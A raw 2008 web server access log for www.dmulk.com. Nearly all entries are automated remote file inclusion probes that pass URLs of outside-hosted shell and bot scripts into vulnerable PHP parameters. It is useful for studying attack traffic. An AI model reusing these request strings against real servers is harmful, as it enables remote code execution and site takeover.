77.221.130.6 - - [19/Aug/2008:10:57:33 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:10:57:39 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:10:57:39 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:57:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:58:05 -0700] "GET /logs/access_080630.log%20/phpSecurePages/secure.php?&cfgProgDir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.22.202 - - [19/Aug/2008:10:58:25 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:58:27 -0700] "GET /logs/access_080630.log%20/errors.php?error=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:58:39 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:58:39 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:58:39 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:58:39 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:58:39 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:58:44 -0700] "GET /logs/access_080730.log//skin/zero_vote/errors.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:58:45 -0700] "GET /logs/access_080731.log//skin/zero_vote/errors.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:00 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:00 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:00 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:00 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:08 -0700] "GET /logs/access_080114.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:59:15 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:59:16 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:59:16 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:59:21 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:59:22 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:24 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:28 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:10:59:28 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:28 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:28 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:10:59:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:10:59:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:32 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:32 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:59:32 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:47 -0700] "GET /logs/access_080411.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:59:47 -0700] "GET /logs/access_080411.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:10:59:47 -0700] "GET /logs/access_080411.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:59:53 -0700] "GET /logs/access_080411.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:00:15 -0700] "GET /logs//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 61289 "-" "libwww-perl/5.812" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:00:16 -0700] "GET //?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 9894 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:11:00:24 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:11:00:24 -0700] "GET //mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:27 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:28 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:28 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:29 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:30 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:31 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:39 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:00:41 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
83.69.68.190 - - [19/Aug/2008:11:00:47 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "http://hk.search.yahoo.com/search?p=what&meta=rst=hk&ei=BIG5&n=10" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:11:00:49 -0700] "GET /logs/access_080731.log/index.php?ort=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:11:00:50 -0700] "GET /logs/index.php?ort=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:11:00:50 -0700] "GET /logs/access_080804.log/index.php?ort=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:11:00:50 -0700] "GET /index.php?ort=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 200 9880 "-" "libwww-perl/5.805" "www.dmulk.com"
83.172.140.17 - - [19/Aug/2008:11:01:03 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.140.17 - - [19/Aug/2008:11:01:03 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:01:06 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:01:13 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:01:31 -0700] "GET /logs/access_080805.log//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
92.48.68.66 - - [19/Aug/2008:11:01:31 -0700] "GET /logs/access_080805.log//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:01:32 -0700] "GET //?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 9894 "-" "libwww-perl/5.812" "www.dmulk.com"
92.48.68.66 - - [19/Aug/2008:11:01:33 -0700] "GET //?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 9894 "-" "libwww-perl/5.808" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:01:33 -0700] "GET /logs//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 61289 "-" "libwww-perl/5.812" "www.dmulk.com"
92.48.68.66 - - [19/Aug/2008:11:01:33 -0700] "GET /logs//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 61289 "-" "libwww-perl/5.808" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:01:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:01:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:11:01:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.17 - - [19/Aug/2008:11:01:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:01:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:01:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:01:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.104 - - [19/Aug/2008:11:01:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.8.104 - - [19/Aug/2008:11:01:47 -0700] "GET /blog/index.php/page/2/?show=gallery&pageid=169 HTTP/1.0" 200 19412 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:01:48 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:01:48 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:01:49 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:01:49 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:01:51 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:01:52 -0700] "GET /logs/access_080804.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:01:52 -0700] "GET /errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:02:11 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:11:02:18 -0700] "GET /logs/access_080731.log/index.php?ort=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
92.48.68.66 - - [19/Aug/2008:11:02:19 -0700] "GET //?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 9894 "-" "libwww-perl/5.808" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:02:33 -0700] "GET /logs/access_080630.log//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
92.48.68.66 - - [19/Aug/2008:11:02:35 -0700] "GET /logs//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 61289 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.68.66 - - [19/Aug/2008:11:02:37 -0700] "GET //?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 9894 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:02:42 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:02:45 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:02:48 -0700] "GET //?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 200 9894 "-" "libwww-perl/5.812" "www.dmulk.com"
92.48.68.66 - - [19/Aug/2008:11:02:55 -0700] "GET /logs/access_080630.log//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:11:03:02 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:11:03:02 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:03:15 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:03:15 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:03:24 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:03:24 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:03:32 -0700] "GET /logs/access_080324.log//modules/xfsection/modify.php?dir_module=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:03:32 -0700] "GET //modules/xfsection/modify.php?dir_module=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:03:33 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.13.99.43 - - [19/Aug/2008:11:03:39 -0700] "GET /logs/access_080725.log//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.13.99.43 - - [19/Aug/2008:11:03:40 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.13.99.43 - - [19/Aug/2008:11:03:40 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:04:05 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:04:05 -0700] "GET //skin/zero_vote/error.php?dir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:04:06 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:04:06 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:04:06 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:04:07 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:04:07 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:04:07 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
